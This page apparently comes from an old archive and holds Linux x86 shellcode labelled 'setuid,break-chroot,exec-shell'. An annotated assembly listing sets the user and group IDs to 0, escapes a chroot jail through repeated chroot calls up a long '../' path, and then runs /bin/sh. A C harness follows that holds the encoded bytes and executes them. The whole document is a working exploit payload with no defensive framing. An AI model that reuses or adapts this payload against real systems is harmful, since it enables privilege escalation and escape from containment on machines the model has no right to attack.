home *** CD-ROM | disk | FTP | other *** search
- /*
- .file "chroot"
- .version "01.01"
- .globl main
- .type main,@function
- main :
- pushl %ebp # shcode recognition
- #init
- movl %esp,%ebp # save stackpointer
- xorl %eax,%eax
- xorl %ebx,%ebx # reset the registers
- xorl %ecx,%ecx
-
- # setuid(0);
- movb $0x17,%al # 0x17 = SYS_setuid
- int $0x80
-
- # setgid(0);
- movb $0x2e,%al # 0x2e = SYS_setgid
- int $0x80
-
- # mkdir("sh");
- jmp 0x39
- popl %esi # get the address of our string
- movb $0x27,%al # 0x27 = SYS_mkdir
- leal 0x5(%esi),%ebx # string location
- movb $0xed,%cl # mode
- int $0x80
-
- # chroot("sh");
- # string addy is in %ebx
- movb $0x3d, %al # 0x3d = SYS_chroot
- int $0x80
-
- # construct string "../../../../../../../../../../"
- movl $0xff2f2e2e,%edx # "../"
- leal 0x4(%ebp),%ebx # save addy of the new string
- movb $0x10,%cl # set the counter
- movl %edx,0x4(%ebp) # construct the string
- addl $0x3,%ebp
- loopne -0x8
- movl %ecx,0x4(%ebp) # put in a NULL
-
- # chroot("../../../../../../../../../../");
- movb $0x3d,%al # Ox3d = SYS_chroot
- int $0x80
-
- # arg[0] = "/bins/sh";
- # arg[1] = 0x0
- # execve(arg[0],arg);
- movl %esi,%ebx
- movl %esi,0x8(%ebp)
- movl %ecx,0xc(%ebp)
- movb $0xb,%al
- leal 0x8(%ebp),%ecx
- leal 0xc(%ebp),%edx
- int $0x80
-
- call -0x3e
- .string "/bin/sh" # doesn't have to be in here
- */
-
- #define CODESIZE 88
- #define NAME "setuid,break-chroot,exec-shell"
- char code[]=
- "\x55\x89\xe5\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xb0\x2e\xcd\x80"
- "\xeb\x39\x5e\xb0\x27\x8d\x5e\x05\xb1\xed\xcd\x80\xb0\x3d\xcd\x80\xba"
- "\x2e\x2e\x2f\xff\x8d\x5d\x04\xb1\x10\x89\x55\x04\x83\xc5\x03\xe0\xf8"
- "\x89\x4d\x04\xb0\x3d\xcd\x80\x89\xf3\x89\x75\x08\x89\x4d\x0c\xb0\x0b"
- "\x8d\x4d\x08\x8d\x55\x0c\xcd\x80\xe8\xc2\xff\xff\xff/bin/sh";
- main()
- {
- int (*funct)();
- funct = (int (*)()) code;
- printf("%s shellcode\n\tSize = %d\n",NAME,strlen(code));
- (int)(*funct)();
- }
-
